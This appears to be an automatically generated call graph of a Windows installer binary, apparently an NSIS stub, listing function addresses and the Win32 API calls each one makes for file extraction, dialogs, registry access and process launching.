CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 